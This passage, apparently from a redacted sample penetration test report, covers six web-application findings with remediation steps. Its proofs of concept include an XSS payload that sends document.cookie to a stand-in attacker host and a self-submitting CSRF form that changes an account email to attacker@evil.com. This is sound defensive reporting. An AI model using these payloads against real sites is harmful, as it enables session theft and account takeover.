The most significant finding (FIND-01) allows an attacker to execute arbitrary JavaScript in an authenticated user's browser session, potentially enabling session hijacking or credential theft.\n\nAll findings include proof-of-concept evidence, CVSS v3.1 scores, and actionable remediation guidance. A retest is recommended within 30 days of remediation deployment.\n\n2. Scope & Methodology\n\nPhase | Activities | Duration\nReconnaissance | Tech fingerprinting, sitemap enumeration, passive recon | Day 1\nAuthentication | Login brute-force protection, account lockout, password reset | Day 1-2\nSession Management | Cookie analysis, token entropy (Burp Sequencer), fixation | Day 2\nInput Validation | XSS, SQLi, XXE, SSRF across all user-controlled parameters | Day 2-3\nAccess Control | Horizontal/vertical privilege escalation, IDOR | Day 3\nTransport Security | TLS version/cipher enumeration, HSTS, certificate validation | Day 3\nError Handling & Headers | Verbose errors, security header audit, clickjacking | Day 4\nReport | Documentation, evidence compilation, remediation guidance | Day 5\n\n3. Risk Summary\n\n0 Critical | 1 High | 2 Medium | 2 Low | 1 Info\n\nID | Title | Severity | CVSS v3.1 | OWASP\nFIND-01 | Reflected XSS via Search Parameter | High | 7.2 | A03:2021\nFIND-02 | CSRF: Missing Anti-Forgery Tokens | Medium | 6.1 | A01:2021\nFIND-03 | Session Cookie Missing HttpOnly/SameSite | Medium | 5.3 | A07:2021\nFIND-04 | TLS: Weak Cipher Suites Accepted (SWEET32) | Low | 3.7 | A02:2021\nFIND-05 | Verbose .NET Stack Trace Disclosure | Low | 3.1 | A05:2021\nFIND-06 | Missing HTTP Security Headers | Info | \u2014 | A05:2021\n\n4. Detailed Findings\n\nFIND-01 \u00b7 A03:2021 Injection \u00b7 CWE-79\nReflected Cross-Site Scripting (XSS) \u2014 Search Parameter\nHigh | CVSS 7.2 | Affected: /search?q=\n7.2 CVSS v3.1\n\nDescription\nThe q parameter on the search endpoint reflects user-supplied input directly into the HTML response without encoding. 
An attacker can craft a malicious URL causing arbitrary JavaScript to execute in an authenticated victim's browser session.\n\nProof of Concept\nGET /search?q=<script>document.location='https://[attacker]/c?d='+document.cookie</script>\nHost: app.REDACTED.com\nCookie: .ASPXAUTH=REDACTED\n\n[Evidence redacted: screenshot of alert() PoC and cookie exfiltration in test environment available on request]\n\nImpact\nSession token theft, credential phishing, keylogging. Combined with FIND-03 (missing HttpOnly), severity approaches Critical \u2014 attacker can extract full session cookie via document.cookie.\n\nCVSS Vector\nCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N\n\nRemediation\nHTML-encode all user output via HttpUtility.HtmlEncode() or Razor built-in encoding. Implement CSP script-src 'self' as defense-in-depth. Allowlist/validate q parameter server-side. Target: 7 days.\n\nFIND-02 \u00b7 A01:2021 Broken Access Control \u00b7 CWE-352\nCSRF: Missing Anti-Forgery Tokens on State-Changing Requests\nMedium | CVSS 6.1 | Affected: /account/update-email, /account/change-password\n6.1 CVSS v3.1\n\nDescription\nThree POST endpoints modifying account state lack anti-CSRF tokens and do not validate Origin or Referer headers. 
Browsers automatically include session cookies in cross-origin requests.\n\nProof of Concept\n<!-- Attacker page -->\n<form action=\"https://app.REDACTED.com/account/update-email\" method=\"POST\">\n  <input type=\"hidden\" name=\"email\" value=\"attacker@evil.com\">\n</form>\n<script>document.forms[0].submit();</script>\n\n[Burp Repeater response redacted: 200 OK confirming email changed in test account]\n\nImpact\nVictim visits attacker page \u2192 email changed to attacker address \u2192 password reset triggered \u2192 full account takeover. SOC 2 CC6.1 control gap.\n\nRemediation\nAdd [ValidateAntiForgeryToken] to all state-changing controller actions. Include @Html.AntiForgeryToken() in forms. Use synchronizer token pattern for API endpoints. Target: 14 days.\n\nFIND-03 \u00b7 A07:2021 Auth Failures \u00b7 CWE-1004\nSession Cookie Missing HttpOnly and SameSite Flags\nMedium | CVSS 5.3 | Affected: ASP.NET_SessionId, .ASPXAUTH\n5.3 CVSS v3.1\n\nDescription\nBoth session cookies lack HttpOnly and SameSite attributes. Secure flag is present. Missing HttpOnly allows JavaScript to read cookie values directly from document.cookie.\n\nEvidence\nSet-Cookie: ASP.NET_SessionId=REDACTED; path=/; Secure\nSet-Cookie: .ASPXAUTH=REDACTED; expires=...; path=/; Secure\n# HttpOnly and SameSite ABSENT from both cookies\n\nConfirmed via Burp Suite response interceptor and Chrome DevTools Application > Cookies panel.\n\nImpact\nChained with FIND-01 (XSS): attacker extracts session token via document.cookie, hijacks authenticated session. Without SameSite, FIND-02 (CSRF) also more effective. Combined severity Critical.\n\nRemediation\nIn web.config: <httpCookies httpOnlyCookies=\"true\" sameSite=\"Strict\" requireSSL=\"true\"/>. 
For forms auth: add cookieSameSite=\"Strict\". Verify post-deploy: IIS config and app-level settings can conflict. Target: 7 days.\n\nFIND-04 \u00b7 A02:2021 Cryptographic Failures \u00b7 CWE-326 \u00b7 CVE-2016-2183\nTLS: Weak Cipher Suites Accepted (3DES / SWEET32)\nLow | CVSS 3.7\n3.7 CVSS v3.1\n\nDescription\nServer accepts TLS 1.2 connections using 3DES and CBC-mode AES suites without forward secrecy. TLS 1.3 is supported and preferred, but legacy suites remain negotiable.\n\nEvidence\n# testssl.sh:\nTLS 1.2   TLS_RSA_WITH_3DES_EDE_CBC_SHA        WEAK\nTLS 1.2   TLS_RSA_WITH_AES_128_CBC_SHA          WEAK (no forward secrecy)\nTLS 1.3   TLS_AES_256_GCM_SHA384                OK\n\n# Manual forced negotiation:\n$ openssl s_client -connect app.REDACTED.com:443 -cipher DES-CBC3-SHA\nCipher: DES-CBC3-SHA    [connected -- not rejected]\n\nRemediation\nDisable legacy ciphers via IIS Crypto. Retain only: TLS_AES_256_GCM_SHA384, TLS_AES_128_GCM_SHA256 (TLS 1.3), TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (TLS 1.2). Verify with Qualys SSL Labs. 
Target: 30 days.\n\nFIND-05 \u00b7 A05:2021 Security Misconfiguration \u00b7 CWE-209\nVerbose Error Pages: .NET Stack Trace Disclosure\nLow | CVSS 3.1 | Affected: multiple endpoints on malformed input\n3.1 CVSS v3.1\n\nDescription\nMalformed input to integer parameters triggers full ASP.NET stack traces exposing internal namespaces, server file paths, and framework version strings.\n\nEvidence\nSystem.FormatException: Input string was not in a correct format.\n   at REDACTED.Controllers.ReportController.GetById(String id)\n   at C:\\inetpub\\wwwroot\\REDACTED\\Controllers\\ReportController.cs:line 47\nServer: Microsoft-IIS/10.0    ASP.NET Version: 4.8.xxxx\n\nRemediation\nSet customErrors mode=\"On\" in web.config with generic error pages. Add global exception handler returning sanitized responses. Remove Server and X-Powered-By response headers. Target: 14 days.\n\nFIND-06 \u00b7 A05:2021 \u00b7 CWE-693 \u00b7 Informational\nMissing HTTP Security Headers\nInfo | Affected: All responses\n\u2014 CVSS v3.1\n\nHeader | Recommended Value | Risk if Absent\nX-Frame-Options | DENY | Clickjacking\nContent-Security-Policy | default-src 'self' | XSS amplification\nStrict-Transport-Security | max-age=31536000; includeSubDomains | SSL stripping\nX-Content-Type-Options | nosniff | MIME sniffing\nReferrer-Policy | strict-origin-when-cross-origin | URL leakage\n\nRemediation\nAdd headers via IIS web.config under <httpProtocol><customHeaders>. Deploy CSP in report-only mode first. Verify at SecurityHeaders.com. Target: 30 days.\n\n5. 
Remediation Roadmap\n\nPriority | Finding | Effort | Target | SOC 2 Control\nP1 | FIND-01: XSS | Low (output encoding) | 7 days | CC6.1, CC6.6\nP1 | FIND-03: Cookie Flags | Low (config change) | 7 days | CC6.1, CC6.7\nP2 | FIND-02: CSRF Tokens | Medium | 14 days | CC6.1, CC6.6\nP2 | FIND-05: Error Disclosure | Low (config change) | 14 days | CC7.2\nP3 | FIND-04: TLS Ciphers | Low (IIS Crypto) | 30 days | CC6.7\nP4 | FIND-06: Headers | Low (web.config) | 30 days | CC6.1\n\nRetest recommended within 30 days of remediation deployment to verify all findings resolved prior to SOC 2 audit submission.\n\n6. Appendix: Tools & References\n\nTool | Purpose\nBurp Suite Pro | Proxy, Intruder, Repeater, Sequencer, Scanner\nOWASP ZAP 2.14 | Active scan, passive analysis\ntestssl.sh 3.0.9 | TLS/cipher enumeration\nnmap 7.94 | Port scan, ssl-enum-ciphers NSE script\nnikto 2.1.6 | Web server misconfiguration baseline\nsqlmap 1.8 | SQL injection verification (non-destructive)\njwt_tool 2.2.7 | JWT token analysis and manipulation\ncurl / httpie | Manual request crafting\nChrome DevTools | Cookie inspection, DOM analysis, network tab\n\nStandards referenced: OWASP Testing Guide v4.2 \u00b7 OWASP Top 10 2021 \u00b7 CVSS v3.1 (FIRST.org) \u00b7 NIST SP 800-115 \u00b7 SOC 2 TSC (AICPA 2017) \u00b7 Microsoft IIS Security Best Practices\n\nSAMPLE REPORT \u2014 REDACTED FOR PORTFOLIO USE \u2014 CONFIDENTIAL \u2014 Prepared by Tejas D. \u00b7 Independent Security Consultant\n", "creation_timestamp": "2026-06-23T16:29:40.000000Z"}]}